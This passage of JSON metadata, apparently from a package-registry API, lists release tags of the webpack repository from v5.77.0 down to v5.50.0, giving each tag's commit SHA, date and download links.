v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18: